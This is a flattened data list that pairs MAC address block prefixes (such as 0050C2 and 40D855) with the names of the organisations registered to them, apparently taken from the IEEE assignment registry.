0050C2747 CDSA Dam Neck 0050C2771 ZigBee Alliance 0050C2716 MITROL S.R.L. 0050C2727 Pelweckyj Videotechnik GmbH 0050C2726 eta systemi CKB 0050C2722 Centric TSolve BV 0050C2739 Tattile srl 0050C270B B.E.A.R. Solutions (Australasia) Pty, Ltd 0050C26DB Gebhardt Ventilatoren GmbH 0050C26DD Zmicro Systems Inc 0050C2701 Keith & Koep GmbH 0050C26E9 Bando electronic communication Co.Lltd 0050C26F3 E3Switch LLC 0050C26E1 NewOnSys Ltd. 0050C26DF QR Sciences Ltd 0050C26C0 GLOSTER SANTE EUROPE 0050C26C9 NETAMI 0050C26C8 B&S MEDIA Co., LTD. 0050C26D7 Mavenir System, Inc. 0050C26DA Techno Fittings S.r.l. 0050C26D3 DigiSensory technologies Pty Ltd 0050C26CC Widmer Time Recorder Co., Inc. 0050C26BC Paraytec Ltd 0050C26A0 GFP Lab S.r.l. 0050C26A8 Delcan Technologies, Inc 0050C26B1 Burk Technology 0050C2688 Elk Products 0050C268E SELCO 0050C2675 Kenton Research Ltd 0050C2666 Xworks NZ Limited 0050C2662 Asia Pacific Card & System Sdn Bhd 0050C266D DIGITEK S.p.A. 0050C2671 Skyline Products, Inc 0050C266F Nilan A/S 0050C2695 Purelink Technology, inc. 0050C2699 Bulletendpoints Enterprises Inc 0050C2686 ANNAX Anzeigesysteme GmbH 0050C263D IDERs Inc 0050C2641 NEO Information Systems Co., Ltd. 0050C263B Powis Corporation 0050C2655 Physik Instrumente (PI) GmbH&Co.KG 0050C2656 LDA Audio Video Profesional 0050C2635 Shockfish SA 0050C2630 Aurora Flight Sciences 0050C264D Tera Information System Labs 0050C2644 Phytec Messtechnik GmbH 0050C2661 P.C.E. 0050C261D Sutus Inc 0050C2600 Protec Fire Detection plc 0050C2613 TATTILE SRL 0050C2612 IHP-GmbH 0050C262B First Control Systems AB 0050C260E Automation and Control Technology, Inc. 0050C260B Shanghai QianJin Electronic Equipment Co. Ltd. 0050C25F6 CAMBRIDGE CONSULTANTS LTD 0050C2605 Swistec GmbH 0050C2606 Shenzhen Huazhong Technology Inc 0050C2619 Linkbit, Inc. 0050C25F5 Genesis inc 0050C25DA TONNA ELECTRONIQUE 0050C25D6 BioAccess Tecnologia em Biometria Ltda. 0050C25EB Garper Telecomunicaciones, S.L. 0050C25D2 DA-Design Oy 0050C25E5 Stresstech OY 0050C25BA SAIA Burgess Controls AG 0050C25BB UNIC TECHNOLOGIES INC 0050C25BC Guangzhou Hui Si Information Technologies Inc. 0050C25B7 AVerMedia Technologies, Inc. 0050C2590 EM Motorsport Ltd 0050C2592 PaloDEx Group Oy 0050C258D ZAO 0050C25AC Kinemetrics, Inc. 0050C258A Dixell S.p.a. 0050C258B Innovative Dynamics GmbH 0050C25AE CPS EUROPE B.V. 0050C259E Legerity 0050C2587 Dynalco 0050C2582 AllSun A/S 0050C255B MATRIX TELECOM PVT. LTD. 0050C2556 Freiburger BlickZentrum 0050C2555 Control Alternative Solutions, Inc. 0050C257C éolane 0050C2561 Seitec Elektronik GmbH 0050C256F GMA, LLC 0050C256E LAB-EL ELEKTRONIKA LABORATORYJNA S.J. 0050C254E Convergent Design 0050C2567 Tess GmbH 0050C255E HANZAS ELEKTRONIKA, SIA 0050C2519 DBMCORP, Inc. 0050C2543 DIGI SESN AG 0050C2528 Tattile srl 0050C2521 ARIS TECHNOLOGIES 0050C251C TOA Systems 0050C24E7 Computerized Elevator Contol 0050C24E6 Photonic Bridges Inc. 0050C24FF Dakty GmbH 0050C24FD Network Automation mxc AB 0050C24E3 Romteck Pty Ltd 0050C250D Clearsonics Pty. Ltd. 0050C250E Fibresavers Corporation 0050C24EE Beijing Corelogic Communication Co., Ltd. 0050C24EC Thales Defence and Security Systems GmbH 0050C24E9 Seachange international 0050C250A Monitor Business Machines Ltd 0050C2508 PUTERCOM ENTERPRISE CO., LTD. 0050C2504 Aphex Systems Ltd. 0050C2505 Computerwise, Inc. 0050C24B0 Esmart Distribution Pte Ltd 0050C24DD Truteq Wireless (PTY) Ltd. 0050C24CC ImpediMed Limited 0050C24C5 eXray Broadband Inc. 0050C24BB Protonic Holland 0050C24DC Ace Electronics, Inc. 0050C24BF Westinghouse Rail Systems Ltd 0050C24C0 Bio-logic Systems Corp 0050C24D4 Herholdt Controls srl 0050C24D3 ELPROC sp. z o.o. 0050C247E Energie Umwelt Systemtechnik GmbH 0050C2475 ISEPOS GmbH 0050C236F XIMEA s.r.o. 0050C24A1 nVent, Schroff GmbH 0050C2491 Fr. Sauter AG 0050C2489 EREE Electronique 0050C248D Metron Sp. z o.o. 0050C2440 Advanced Modular Computers Ltd. 0050C2458 HRZ data GmbH 0050C2456 DRDC Valcartier 0050C2454 Brivo Systems, LLC 0050C244E QQ Technology,Inc 0050C244D Electro-Matic Products, Inc. 0050C243A ProDesign GmbH 0050C245D Digital Engineering, Inc. 0050C243D Ann Arbor Sensor Systems LLC 0050C243C Ducommun LaBarge Technologies, Inc 0050C246C CAMCO GmbH 0050C2465 PDTS GmbH 0050C2464 XYTAC system technologies 0050C2413 Goodrich 0050C240C Applied Materials UK Ltd 0050C23F4 MC TECHNOLOGY GmbH 0050C23F1 Salland Electronics Holding BV 0050C2417 QT systems ab 0050C242B VLSIP TECHNOLOGIES, INC. 0050C2427 Scheidt & Bachmann GmbH 0050C2426 STOM System 0050C2429 Matthews Australasia 0050C23FC Weinberger Deutschland GmbH 0050C2432 Topway Industries Ltd. 0050C2430 Arcom Digital 0050C2423 Power-One Inc. 0050C2406 CoreStreet, Ltd 0050C23FF Cast Iron Systems 0050C23BF Audio Processing Technology Ltd 0050C2383 ICS Electronics 0050C23AB taskit Rechnertechnik GmbH 0050C23B5 NEC TOKIN Corporation 0050C23C7 Salent Technologies Ltd 0050C23C5 Silicon Optix Canada Inc. 0050C23C8 Wheels of Zeus Inc. 0050C23F0 megatec electronic GmbH 0050C23CF Technovare Systems, Inc. 0050C23A8 Engim, Inc. 0050C23A4 Silvertree Engineering Ltd 0050C238C EPSILON SRL 0050C2388 IEE Inc 0050C237C MODIA SYSTEMS Co., Ltd 0050C2375 TIR Systems Ltd. 0050C2390 TC Communications 0050C237F Foresearch 0050C23A1 Samsoft 0050C2395 vidisys gmbh 0050C2325 Federal Aviation Administration 0050C2327 Dornier GmbH 0050C2328 I.C.S. Electronics Limited 0050C234C Chuo Electric Works Co., LTD. 0050C2349 SSI Schaefer Peem 0050C2348 KoolSpan, Inc. 0050C232D Consens Zeiterfassung GMBH 0050C2331 Broadcast Sports Inc 0050C2343 ABB Xiamen Switchgear Co. Ltd. 0050C233B MultimediaLED 0050C2368 ASPEL S.A. 0050C2317 Cosine Systems, Inc. 0050C2316 Dataline AB 0050C22EB Lingg & Janke OHG 0050C22E6 DALSA 0050C22E7 SafeView, Inc. 0050C22E3 MG Industrieelektronik GmbH 0050C22DE Research Applications 0050C230B VX Technologies Inc. 0050C230E Obvius 0050C22FE Saab AB 0050C231E C3-ilex, LLC 0050C22D0 Worth Data, Inc. 0050C22AB AUM Infotech Private Limited 0050C22A9 Dr. Staiger, Mohilo + Co GmbH 0050C22A6 Brannstroms Elektronik AB 0050C22B8 Admiral Secure Products, Ltd. 0050C22B1 Private 0050C22CD DataWind Research 0050C228C Futaba Corporation 0050C2289 Rototype S.p.A. 0050C228D AXODE SA 0050C2284 Micronet Ltd. 0050C2299 CAD-UL GmbH 0050C227F Air Broadband Communications, Inc. 0050C2294 EPSa GmbH 0050C2256 Information Technology Corp. 0050C2246 Hardmeier 0050C2253 DSM-Messtechnik GmbH 0050C224F Macronet s.r.l. 0050C2276 Tieline Research Pty Ltd 0050C2229 eko systems inc. 0050C2224 PANNOCOM Ltd. 0050C2232 SIMET 0050C2233 EdenTree Technologies, Inc. 0050C2213 SysAware S.A.R.L. 0050C2235 POLIMAR ELEKTRONIK LTD. 0050C21F2 Tattile srl 0050C21ED EMKA-electronic AG 0050C21EE Perto Periféricos de Automação S.A. 0050C21E6 United Tri-Tech Corporation 0050C21E7 Smith Meter, Inc. 0050C2201 OlympusNDT 0050C2208 nNovia, Inc. 0050C21FB Willowglen Systems Inc. 0050C21F7 ARC'Créations 0050C2212 4Links Limited 0050C21D7 Pleora Technologies Inc. 0050C21E4 Soronti, Inc. 0050C21E2 DIGITRONIC Automationsanlagen GmbH 0050C21BD AIOI Systems Co., Ltd. 0050C21C6 Remco Italia Spa 0050C21C8 Euphony technology CO., LTD. 0050C21C5 Flander Oy 0050C21D4 Phase IV Engineering Inc. 0050C21B8 Electronic Systems Development 0050C21E1 Automaatiotekniikka Seppo Saari Oy 0050C219D ELECTREX S.R.L 0050C2199 Survalent Technology Corporation 0050C21B5 Thrane & Thrane A/S 0050C21B1 Axes Technologies 0050C21A4 Protech Optronics Co. Ltd. 0050C2174 N&P Technologies 0050C217F PDQ Manufacturing 0050C218B Teradyne Inc. 0050C218C Technodrive srl 0050C217A WOLF Advanced Technology. 0050C2095 SEATECH 0050C214D wellink, Ltd. 0050C216F Dickson Technologies 0050C2009 Datakinetics Ltd. 0050C215F Pulsar GmbH 0050C215A Plextek Limited 0050C216A Time Domain 0050C2002 Integrated Automation Solutions 0050C2154 Jostra AB 0050C213C NBG Industrial Automation B.V. 0050C213A Tex Computer SRL 0050C213E AVerMedia Systems, Inc. 0050C212A Symbolic Sound Corp. 0050C2133 ChipWrights, Inc. 0050C2132 Procon Electronics 0050C2118 Microbit 2.0 AB 0050C211A Teamaxess Ticketing GmbH 0050C2113 Ace Electronics, Inc. 0050C210C Photonic Bridges, Inc. 0050C210E Unipower AB 0050C2109 ITK Dr. Kassen GmbH 0050C20F7 Foss NIRSystems, Inc. 0050C20F3 Young Computer Co., Ltd. 0050C20EA iReady Corporation 0050C20E5 Clearwater Networks 0050C20E8 Audio Design Associates, Inc. 0050C20D3 Lake Technology, Ltd. 0050C20D1 Renaissance Networking, Inc. 0050C20D0 Telefrang AB 0050C20CE RFL Electronics, Inc. 0050C20C9 DSS Networks, Inc. 0050C20C0 Imigix Ltd. 0050C20BB MAZet GmbH 0050C20BD Tattile 0050C20B1 Beeline Networks, Inc. 0050C20C1 Casabyte 0050C20AE Zarak Systems Corp. 0050C20C8 The Trane Company 0050C20C7 TransComm Technology System, Inc. 0050C2094 Analytical Spectral Devices, Inc. 0050C2090 Invensys Controls Network Systems 0050C207D Caspian Networks 0050C206D Advanced Signal Corp. 0050C2061 Simple Network Magic Corporation 0050C2036 Arcturus Networks Inc. 0050C2035 Alliant Techsystems, Inc. 0050C204B Tecstar Demo Systems Division 0050C203B VNR Electronique SA 0050C2043 Curtis, Inc. 0050C2040 MiSPO Co., Ltd. 0050C203C BrainBoxes Ltd 0050C203E MSU UK Ltd 0050C2026 Abatis Systems Corp. 0050C2032 MotionIO 0050C2012 Floware System Solutions Ltd. 0050C201F KBS Industrieelektronik GmbH 0050C201A Skylake Talix 0050C201B Cross Products Ltd. 0050C2005 GD California, Inc. 0050C293B Cleaveland/Price, Inc. 0050C23DC 3D perception AS 0050C2BE5 RF Code 0050C2F1C GD Mission Systems 0050C2FA8 Yash SiQure Technologies India Pvt. Ltd. 0050C2D30 ACTIV Financial Systems, Inc. 0050C24F6 RealD, Inc. 0050C2964 IQ Automation GmbH 40D8551E1 AD QUALITE 0050C2659 Dorsett Technologies Inc 40D85510C Contrans TI sp. z o.o. 0050C2AA3 Peek Traffic Corporation 0050C29F8 Austco Marketing & Service (USA) ltd. 0050C2664 Westel Wireless Systems 0050C2CA3 CT Company 40D85515F CT Company 0050C2A7E Densitron Technologies Ltd 0050C2FD7 DEUTA-WERKE GmbH 0050C2FBA Elbit Systems of America 0050C21DD peiker acustic GmbH 0050C2B54 APG Cash Drawer, LLC 0050C274E TRONICO 0050C2764 ARGUS-SPECTRUM 40D85517A ARGUS-SPECTRUM 40D85504E Honeywell International 40D855080 Honeywell 0050C2583 Junger Audio-Studiotechnik GmbH 0050C2717 MB connect line GmbH Fernwartungssysteme 0050C2FE9 MB connect line GmbH Fernwartungssysteme 40D85513F Zhejiang Wellsun Electric Meter Co.,Ltd 0050C2A2E YUYAMA MFG Co.,Ltd 0050C2D09 Guardtec,Inc 0050C21D8 Guardian Controls International Ltd 0050C231D Imarda New Zealand Limited 0050C2FE7 Erhardt+Leimer GmbH 0050C2E24 DiTEST Fahrzeugdiagnose GmbH 0050C2A80 ard sa 0050C2FD1 Enyx SA 0050C29B2 Mesa Labs, Inc. 0050C2A60 Arrow Central Europe GmbH - Division Spoerle 40D855024 Electrical Geodesics Incorporated 0050C2F9D JSC "Kaluga Teletypes Manufacturing Plant" 0050C249D Critical Link LLC 0050C2760 AR'S CO., LTD. 0050C2485 Phytec Messtechnik GmbH 0050C2459 Phytec Messtechnik GmbH 0050C2138 Delphin Technology AG 0050C2601 MedAvant Healthcare 0050C21C3 TT electronics plc 0050C2F33 Applied Micro Electronics AME bv 0050C2B30 Applied Micro Electronics AME bv 40D855093 Sentry 360 Security 0050C221C Fracarro srl 40D85515A DORLET SAU 40D85506F DORLET SAU 0050C29E7 DORLET SAU 40D855125 Scandyna A/S 0050C26B2 Edgeware AB 40D8550F8 Better Place 0050C2168 ExtremeSpeed Inc. 0050C2A78 Apantac LLC 40D855089 Wuhan Xingtuxinke ELectronic Co.,Ltd 0050C2888 IAdea Corporation 0050C20B9 Helmut Mauell GmbH Werk Weida 0050C2F2D Robert Bosch Healthcare Systems, Inc. 0050C25E2 PYRAMID Computer GmbH 0050C28C8 Pumatronix Equipamentos Eletronicos Ltda. 0050C2667 Vocality International Ltd 40D85514B Vocality International Ltd 0050C226E ZP Engineering SEL 0050C25FE NOVACOMM LTDA 0050C2D84 ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 0050C2DE1 ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 0050C29F9 ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 40D85506C Rohde&Schwarz Topex SA 40D85518A Aplex Technology Inc. 40D855110 Aplex Technology Inc. 0050C2B49 Aplex Technology Inc. 40D855102 Power Electronics Espana, S.L. 0050C2ED5 RFL Electronics, Inc. 0050C28E2 Wireless Cables Inc. 0050C26FB WaveIP 0050C21CC WaveIP 0050C29A9 GD Mission Systems 0050C221B GD Mission Systems 0050C2A56 ReaMetrix, Inc. 0050C214C Optibase Ltd. 0050C20B0 LMI Technologies 0050C293D Lighting Science Group 0050C20A2 Jäger Computergesteuerte Meßtechnik GmbH. 0050C2B76 ITF Fröschl GmbH 0050C29CF Intuitive Surgical, Inc 0050C2F97 Sicon srl 0050C22ED 4RF Communications Ltd 0050C24C2 Elbit Systems Ltd. 0050C22F4 Efficient Channel Coding 0050C2CBA DELTA TAU DATA SYSTEMS, INC. 0050C226C Crystal Vision Ltd 0050C21BC DINEC International 0050C2BE7 Genetec Inc. 0050C2410 Grossenbacher Systeme AG 40D855133 TATTILE SRL 0050C2501 IBEX UK Limited 0050C2447 Grupo Epelsa S.L. 40D855111 Grupo Epelsa S.L. 0050C22E0 Baxter International Inc 0050C20E0 EMAC, Inc. 40D85509D EMAC, Inc. 40D85550D Shenzhen MaiWei Cable TV Equipment CO.,LTD. 40D8551DE Vidisys GmbH 40D8551CE Peter Huber 40D8551CF Omnik New Energy Co., Ltd 40D8551B3 BETTINI SRL 40D8551B2 AGE A. Gilg Elektronik 40D8551B1 Logos 01 S.r.l. 40D8551D9 Commercial Wireless Systems International LLC. 40D8551DA Energy Technology and Control Ltd. 40D8551D6 EMS Computers Pty Ltd 40D8551D7 Wheatstone Corporation 40D8551D4 Prisma Engineering srl 40D8551C0 NPB Automation AB 40D8551B0 Shin-ei Electronic Measuring Co.,Ltd. 40D8551BA Creative Lighting And Sound Systems Pty Ltd 40D8551AF Vigitron Inc. 40D8551AC ELAN SYSTEMS 40D8551AB Rosslare Enterprises Limited 40D8551C6 Device Solutions Ltd 40D855198 devboards GmbH 40D855191 Soukai Electric 40D8551A6 RB-LINK Wireless 40D85518B Diagnosys Test Systems Ltd 40D855161 Solidscape Inc 40D855178 REDER Domotic GmbH 40D85516F BrightLeaf Power 40D85515E Prodco International Inc. 40D85516E Secuinfo Co.Ltd 40D855166 Anhui Jiante Network Technology Co., Ltd. 40D855151 Progress Rail Services, Inspection and Information Systems 40D85514D SOMFY SAS 40D85514A GD Mission Systems 40D855146 Pleiger Elektronik GmbH and Co. KG 40D855136 Devriecom B.V. 40D855145 Weber Marking Systems GmbH 40D855144 Venco 40D855130 GSP Sprachtechnologie GmbH 40D8550FA Marmitek BV 40D8550F9 Invisua Lighting BV 40D8550F6 Private 40D855123 ZAO NPC Kompjuternie Technologii 40D85511F KOMPAN Pawel Sokolowski 40D855121 shanghai Anjian Information technology co. , ltd. 40D85510F CAVALRY STORAGE INC 40D855113 Testbook Ltd 40D855124 Debug s.r.l. 40D855100 TASK SISTEMAS DE COMPUTACAO S.A. 40D8550DF Xadi Inc 40D8550D0 Icraft Oy 40D8550CF Clark-MXR, Inc. 40D8550D1 Cantada Inc 40D8550CB ReliOn Inc 40D8550DD Embed Limited 40D8550E7 LIGHTSTAR 40D855092 Wasserbauer GmbH 40D8550B6 Telvent 40D8550B8 Ferlin Trading BV 40D8550BB Whiptail 40D8550BD iCOGNIZE GmbH 40D8550BE Manufacturing System Insights Inc 40D8550AC Fraunhofer HHI 40D8550A5 WooshCom Corporation 40D8550A0 Quantronix, Inc. 40D85509C Keyware Solutions Inc. 40D855099 idcell co.ltd 40D85507D Wuxi SiNeng New Energy Co., Ltd. 40D855085 Peek Traffic Corporation 40D855083 DELOPT 40D855070 JSC Electrical Equipment Factory 40D855090 Axxess Identification Ltd 40D855059 COLONIAL ASSEMBLY and DESIGN 40D855055 Helmholtz Zentrum Dresden Rossendorf e.V. 40D855063 Protonic Holland 40D85505A Ultra Electronics Flightline Systems 40D855039 CI Systems Ltd 40D855061 Cominfo, Inc. 40D855049 Thermo Fisher Scientific 40D855045 Genadsystem 40D85504F Haein S&S Co., Ltd 40D855056 GROUP 57 40D855052 DAN ELECTRONICS SYSTEM (P) LIMITED 40D85504D MACHINEPERFORMANCE ApS 40D855034 Dacom West GmbH 40D855031 Dommel GmbH 40D855026 Symetrics Industries 40D855021 SMT D.O.O. 40D855008 Kaori Industria Eletronica Ltda 40D855002 Hangzhou Chenxiao Technologies Co. Ltd. 40D855007 Digital Audio SA 40D855004 CR Magnetics, Inc. 40D85501B Audio Enhancement 40D855018 STANEO SAS 40D855011 Flexim Security Oy 40D85500F DIGITAL DYNAMICS, INC. 0050C2FF3 CONTROL SYSTEMS Srl 0050C2FF0 GD Mission Systems 0050C2FEF Task Sistemas de Computacao 0050C2FE8 Mango DSP, Inc. 0050C2FE6 Exibea AB 0050C2FD0 Simple Solutions 0050C2FD2 Autonomic Controls. Inc 0050C2FFB SEFRAM 0050C2FB8 TECHNO CO.,LTD. 0050C2FB5 Assembly Contracts Limited 0050C2FA0 Amplus Communication Pte Ltd 0050C2FA9 Hijet Print d.o.o. 0050C2F6C Pro Design Electronic GmbH 0050C2F7A C3 LLC 0050C2F75 PumpWell Solutions Ltd. 0050C2F94 Digital Barriers 0050C2F80 SYS TEC electronic GmbH 0050C2F88 RTC Manufacturing Inc. 0050C2F5F BORYEU TECHNOLOGY CO.,LTD 0050C2F54 Hella Gutmann Solutions GmbH 0050C2F4D KNOWHOW INFOCOM INC. 0050C2F66 GWT LLC 0050C2F47 cadac,inc. 0050C2F3F DENSEI COMMUNICATION Inc. 0050C2F4F BAP Precision Ltd. 0050C2F30 Miris AB 0050C2F2F Arcos Technologies LTD 0050C2F11 Organis GmbH 0050C2EFE PLR Information Systems Ltd. 0050C2F16 Peter Huber Kältemaschinenbau GmbH 0050C2F28 Vertex Antennentechnik GmbH 0050C2F22 Harland Simon plc 0050C2EEF IDTRONIC GmbH 0050C2EF1 Saia-Burgess Controls AG 0050C2EED Future Design Controls, Inc 0050C2EE3 Tecnint HTE SRL 0050C2EE1 Procon Electronics 0050C2EDD EBNEURO SPA 0050C2EFB Norbit ODM AS 0050C2EF2 Specialty Microwave Corp 0050C2EFC Private 0050C2EAC Alias ip 0050C2EB4 Wishtek Technology, Inc. 0050C2EC8 IBERNEX INGENIERIA, S.L. 0050C2EC4 Logical Electromechanical Sys Inc. 0050C2EC2 Ixonos Plc 0050C2E95 Dlite Comercio, Importadora e Serviços de Automação Ltda 0050C2EA5 Aerodata AG 0050C2E81 Adaptive Technologies, Inc. 0050C2E82 Xplore Technologies Corp 0050C2E7F LS Control A/S 0050C2E80 Saia-Burgess Controls AG 0050C2E62 SAE IT-systems GmbH & Co. KG 0050C2E8A Macronet s.r.l. 0050C2E89 PROTEQSEN 0050C2E86 Multisuns Corporation 0050C2E87 Lamson Safes & Security 0050C2E5F Pantec Engineering AG 0050C2E5B CAIPO Automazione Industriale s.r.l. 0050C2E58 Agri-hitech LLC 0050C2E78 TASK SISTEMAS DE COMPUTACAO LTDA 0050C2E74 Will corp. 0050C2E4A GHL Systems Bhd 0050C2E49 CTF TECHNOLOGIES DO BRASIL LTDA 0050C2E37 FUJI DATA SYSTEM Co., Ltd 0050C2E2C EN ElectronicNetwork Hamburg GmbH 0050C2E59 Saia-Burgess Controls AG 0050C2E33 Morita Technical Center Company 0050C2E2F Beam Ltd 0050C2E0C YOUHO ELECTRIC IND.,LTD. 0050C2E0B Seartech 0050C2E1C Saia-Burgess Controls AG 0050C2E11 RadioMobile Inc 0050C2E12 Kago Electronics BV 0050C2E16 Jetstream Ltd. 0050C2E08 KST Technology 0050C2E02 Cleverscope 0050C2DF3 INSEVIS GmbH 0050C2DF7 Combilent 0050C2DFF TANTAL ELECTRONICA, SL 0050C2DC7 AGT Holdings Limited 0050C2DE4 EGS Technologies Ltd 0050C2DDF Device GmbH 0050C2DDA rbz robot design s.l. 0050C2DD7 Tornado Modular Systems 0050C2DC3 ZED Ziegler Electronic Devices GmbH 0050C2DE5 Neets 0050C2DE9 Dacom West GmbH 0050C2DD1 Brankamp GmbH 0050C2D97 ERS electronic GmbH 0050C2DBC Nantes Systems Private Limited 0050C2DB9 Peek Traffic Corporation 0050C2D65 TX Technology Corp 0050C2D61 system2 GmbH 0050C2D85 VITEC 0050C2D81 Tattile srl 0050C2D50 Solbrig Electronics, Inc. 0050C2D4E Keith & Koep GmbH 0050C2D4A ATH system 0050C2D6D Pro-Digital Industria Eletronica 0050C2D6A A&T Corporation, Electrics Group , LAS R&D Unit, 0050C2D69 GHL Systems Bhd 0050C2D40 demmel products 0050C2D3C ASSYSTEM France 0050C2D1A GILLAM-FEI S.A. 0050C2D18 Glyn GmbH & Co.KG 0050C2D17 CUE, a.s. 0050C2D33 Maddalena S.p.A 0050C2D36 Enatel Limited 0050C2D32 RealTime Systems Ltd 0050C2D2F Key Systems, Inc. 0050C2D3A WellSense Technologies 0050C2D37 LJT & Associates, Inc. 0050C2D25 VAF Instruments BV 0050C2D22 eMDee Technology, Inc. 0050C2D2E RS Gesellschaft fur Informationstechnik mbH & Co KG 0050C2D13 GUNMA ELECTRONICS CO LTD 0050C2D0C JVL Industri Elektronik 0050C2D0D DECA Card Engineering GmbH 0050C2D07 IAF GmbH 0050C2D04 Tehama Wireless 0050C2CBB Coptonix GmbH 0050C2CBD Hi Tech Electronics Ltd 0050C2CB9 Micro Technic A/S 0050C2CCB CaptiveAire Systems Inc. 0050C2CC8 Private 0050C2CC5 Tecnovum AG 0050C2CC3 viscount systems inc. 0050C2CD7 Saia-Burgess Controls AG 0050C2CD2 SIM2 Multimedia S.p.A. 0050C2CCD FUJI DATA SYSTEM Co.,Ltd. 0050C2CCF TASK SISTEMAS DE COMPUTACAO LTDA 0050C2CD0 MME Mueller Mikroelektronik 0050C2CC1 Level 3 Communications 0050C2CD8 IT-IS International Ltd. 0050C2CD9 NDC Infrared Engineering, Inc. 0050C2CE1 Satellink Inc. 0050C2CEB Toyon Research Corporation 0050C2CEA Keith & Koep GmbH 0050C2CF8 beks Kommunikacios Technika kft 0050C2CA7 Thermo Fisher Scientific 0050C2C98 Criticare Systems, Inc 0050C2C96 CyberCraft 0050C2C92 EMAC, Inc. 0050C2C8A Automated Media Services, Inc. 0050C2CAE Campbell Scientific Canada Corp. 0050C2C9D Radius Sweden AB 0050C2CA6 Vidisys GmbH 0050C2C4D Industrial Automation Systems 0050C2C5C WAVECOM ELEKTRONIK AG 0050C2C57 High Speed Design, Inc. 0050C2C45 Galvamat & Unican Technologies SA 0050C2C40 BAE Systems Bofors AB 0050C2C43 Cammegh Limited 0050C2C6B SiGarden Sp z o.o. 0050C2C6E TBS Holding AG 0050C2C69 REBO CO.,LTD. 0050C2C62 Zeus Systems Private Limited 0050C2C86 Bruckner & Jarosch Ingenieurgesellschaft mbH 0050C2C82 Kyosha Industries 0050C2C59 SKD System AB 0050C2C56 Spirent Communications 0050C2C3D PLA ELECTRO APPLIANCES PVT. LTD. 0050C2C78 9Solutions Oy 0050C2C04 SoGEME 0050C2BFF I.S.A. S.r.l. 0050C2BF8 Crtiical Link 0050C2C14 Spectronix Corporation 0050C2C0E AVItronic GmbH 0050C2C2A RealTime Systems Ltd 0050C2C27 Qtechnology A/S 0050C2BF3 Wanco Inc. 0050C2C30 Wagner Group GmbH 0050C2C1C Becton Dickinson 0050C2C17 Axis-Shield PoC AS 0050C2C09 Globe Wireless 0050C2C06 ANALOG WAY 0050C2C20 SRC Computers, LLC 0050C2BC7 PTS GmbH 0050C2BC5 Toptechnology SRL 0050C2BC1 Sentec Ltd 0050C2BDB GasTOPS Ltd. 0050C2BD6 BG Systems, Inc. 0050C2BA5 InterCel Pty Ltd 0050C2BA4 CUSTOS MOBILE S.L. 0050C2BBB GHL Systems Berhad 0050C2BB8 MoeTronix 0050C2BEC DRS Laruel Technologies 0050C2BE3 Jiskoot Ltd 0050C2BE1 Tattile srl 0050C2BB0 Gainbrain 0050C2BD3 Postjet Systems Ltd 0050C2B78 Folink 0050C2B74 AXED Jakubowski Wojciechowski sp.j. 0050C2B6E Private 0050C2B5A GREEN Center s.r.o. 0050C2B68 Electronic Systems Protection, Inc. 0050C2B67 RC Systems Co. Inc. 0050C2B63 RO.VE.R. Laboratories S.p.A 0050C2B99 Greenlight Innovation Corp. 0050C2B91 Finnet-Service Ltd. 0050C2B8E WAC (Israel) Ltd. 0050C2B9D W. Vershoven GmbH 0050C2B9F AUDIOSCOPE 2K SRL 0050C2B98 Southwest Research Institute 0050C2B80 iScreen LLC 0050C2B7D ELETECH Srl 0050C2B52 SMH Technologies 0050C2B50 SELCO 0050C2B4E AixControl GmbH 0050C2B41 Tata Power Company, Strategic Electronics Division 0050C2B42 ETM Electromatic Incorporated 0050C2B3E Sage Consultants 0050C2B3C JanasCard 0050C2B32 Byres Security Inc 0050C2B1E Abbott Medical Optics 0050C2B23 Ronyo Technologies s.r.o. 0050C2B1C Phytec Messtechnik GmbH 0050C2B1A ELCUS 0050C2B43 J-Systems Inc. 0050C2B39 siXis, Inc. 0050C2B38 Grenmore Ltd 0050C2B13 Measy Electronics Co., Ltd. 0050C2B08 Goerlitz AG 0050C2B06 CompuDesigns, Inc. 0050C2AFF XoByte LLC 0050C2AF8 Global Satellite Engineering 0050C2AF9 Ingenieurbuero Bickele und Buehler GmbH 0050C2AEF National CineMedia 0050C2B0C SMARTB TECHNOLOGIES 0050C2ACF SP Controls, Inc 0050C2AD0 Geonautics Australia Pty Ltd 0050C2ACC ProPhotonix 0050C2ACA Soft & Control Technology s.r.o. 0050C2AC9 Steinbeis-Transferzentrum Embedded Design und Networking 0050C2AE7 Redwood Systems 0050C2AE8 Bit-Lab PTY LTD 0050C2AE6 VECOM USA 0050C2AAF Santa Barbara Instrument Group 0050C2AB8 AHM Limited (CLiKAPAD) 0050C2AB7 Twinfalls Technologies 0050C2AC6 Marathon Products, Inc. 0050C2AC2 OpenXS B.V. 0050C2ABF MCC Computer Company 0050C2AD4 Global Rainmakers Inc. 0050C2AD3 Peek Traffic Corporation 0050C2ADF Altinex, Inc 0050C2ADB GO engineering GmbH 0050C2AD8 Incyma 0050C2A9D Joehl & Koeferli AG 0050C2A9C Star Electronics GmbH & Co. KG 0050C2A98 Sentry 360 Security 0050C2A85 JOYSYSTEM 0050C2A84 Lino Manfrotto +Co spa 0050C2A9E Procon Engineering Limited 0050C2A7A DetNet South Africa PTY (LTD) 0050C2A76 Roesch & Walter Industrie-Elektronik GmbH 0050C2A75 JTL Systems Ltd. 0050C2A61 Fr. Sauter AG 0050C2A6C Figment Design Laboratories 0050C2A65 Mark-O-Print GmbH 0050C2A8E BFI Industrie-Elektronik GmbH & Co.KG 0050C2A11 OJSC Rawenstvo 0050C2A0C Phytec Messtechnik GmbH 0050C2A2C KWS-Electronic GmbH 0050C2A29 Luminex Corporation 0050C2A28 KENDA ELECTRONIC SYSTEMS LIMITED 0050C2A26 Preferred Oil, LLC 0050C2A22 Nippon Manufacturing Service Corporation (abbreviated as 'nms') 0050C2A3F LHA Systems CC 0050C2A3D OWANDY 0050C2A3E DUEVI SNC DI MORA E SANTESE 0050C2A38 Tred Displays 0050C2A47 PRIMETECH ENGINEERING CORP. 0050C2A43 NKS Co.Ltd. 0050C2A46 Softronics Ltd. 0050C2A55 Arrowvale Electronics 0050C2A57 Juice Technologies, LLC 0050C2A52 The VON Corporation 0050C2A4D LevelStar LLC. 0050C2A37 Software Systems Plus 0050C2A1A DDL 0050C29C7 Kumera Drives Oy 0050C29C4 Vitel Net 0050C29C3 GE Security-Kampro 0050C2A05 Adgil Design Inc. 0050C2A01 Patronics International LTD 0050C29BF 2N TELEKOMUNIKACE a.s. 0050C29BE Xad Communications Ltd 0050C29D8 SAMSUNG HEAVY INDUSTRIES CO.,LTD. 0050C29D6 Innovation, Institute, Inc 0050C29D7 Melex 